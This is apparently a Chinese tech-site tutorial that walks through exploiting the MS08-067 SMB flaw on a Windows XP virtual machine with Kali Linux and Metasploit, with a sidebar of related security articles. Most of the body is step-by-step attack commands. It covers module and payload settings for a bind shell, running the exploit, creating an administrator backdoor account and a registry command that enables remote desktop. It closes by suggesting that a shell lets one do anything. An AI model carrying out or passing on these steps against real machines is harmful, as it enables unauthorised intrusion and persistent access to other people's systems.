专业IT网络知识平台,分享IT百科知识、生活百科知识解答!

易企推科技
易企推科技

kalilinux攻击漏洞MS08_067

来源:小易整编  作者:小易  发布时间:2023-09-12 03:55
摘要:在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境,kalilinux:192.168.116.3winxp192.168.116.116要做的就是用KaliLinux里的Me...

在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境,kalilinux:192.168.116.3 winxp 192.168.116.116 要做的就是用Kali Linux里的Metasploit入侵WinXP

kalilinux攻击漏洞MS08_067

操作方法 01

在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole)

02

然后运行命令: use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序

03

set LHOST 192.168.116.3 #设置本地主机IP

04

set RHOST 192.168.116.116 #设置目标主机IP

05

set payload windows/shell_bind_tcp #设置payload

06

show options#查看设置信息

07

exploit#实施攻击

08

攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。

09

添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况

10

发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

11

有了目标主机的cmdshell你想做什么不行吧?

12

好了演示到此完毕!


本文地址:网络知识频道 https://www.hkm168.com/jiqiao/1061212.html,易企推百科一个免费的知识分享平台,本站部分文章来网络分享,本着互联网分享的精神,如有涉及到您的权益,请联系我们删除,谢谢!


网络知识
小编:小易整编
相关文章相关阅读
  • 什么属于dos攻击

    什么属于dos攻击

    dos具有代表性的攻击手段包括pingofdeath、teardrop、udpflood、synflood、landattack、ipspoofingdos等。dos即拒绝服务,其目的是使计算机或网络无法提供正常的服务。本教程操作环境:wi...

  • 网络钓鱼攻击是什么,如何防范?

    网络钓鱼攻击是什么,如何防范?

    随着互联网的发展,网络钓鱼攻击在网络空间日渐普遍。简而言之,网络钓鱼是一种利用欺骗手段获取个人信息、财务信息和敏感信息的攻击方式。在这篇文章中,我们将探讨网络钓鱼的定义、攻击形式和如何防范此类攻击。网络钓鱼攻击涉及的定义网络钓鱼攻击是指使用...

  • 网络攻击的种类有哪些?

    网络攻击的种类有哪些?

    网络攻击的种类有:1、主动攻击,会导致某些数据流的篡改和虚假数据流的产生;这类攻击可分为篡改、伪造消息数据和终端(拒绝服务)。2、被动攻击,通常包括窃听、流量分析、破解弱加密的数据流等攻击方式。本教程操作环境:Windows10系统、Del...

  • 如何应对勒索病毒攻击?

    如何应对勒索病毒攻击?

    勒索病毒攻击是一种常见的网络安全威胁,它通过加密用户的重要文件或者阻止用户访问计算机系统来勒索赎金。勒索病毒攻击可以给个人和企业带来巨大的损失,因此,我们必须采取正确的措施来防范和应对这种威胁。首先,要定期备份数据。定期备份至少可以减少重要...

  • Nginx的漏洞分析及防范

    Nginx的漏洞分析及防范

    nginx是一款广泛应用于互联网领域的高性能web服务器软件,由于其高效、可靠、安全等优势,已成为许多大型网站和应用程序的首选。但是,和其他软件一样,nginx也不是完美的,存在一些漏洞,给服务器安全带来威胁。因此,本文将对nginx的漏洞...

  • ddos攻击工具有哪些

    ddos攻击工具有哪些

    ddos(分布式拒绝服务)攻击是一种常见的网络攻击方式,旨在通过发送大量的请求来超载目标服务器或网络,使其无法正常运行。这种攻击通常由恶意用户或黑客组织使用特定的工具来执行。在本文中,我们将介绍一些常见的ddos攻击工具。1.LOIC(低...

  • ip地址被攻击怎么办

    ip地址被攻击怎么办

    ip地址被攻击的解决办法有分析攻击类型、设置防火墙、封堵ip地址、隔离通信链路、通知相关机构、加强安全防护、收集证据和加强安全意识培训等。详细介绍:1、分析攻击类型,首先需要分析攻击的类型和方式,了解攻击者的行为和目的;2、防火墙设置,通过...

  • 电脑系统漏洞如何修复

    电脑系统漏洞如何修复

    修复方法有及时更新操作系统、更新软件和应用程序、安装和更新防病毒软件、配置防火墙、使用强密码和多因素身份验证、定期备份数据、注意安全意识和行为、参考安全专家建议等。详细介绍:1、及时更新操作系统:操作系统厂商会定期发布安全补丁来修复已知漏洞...

  • 周排行
  • 月排行
  • 年排行

精彩推荐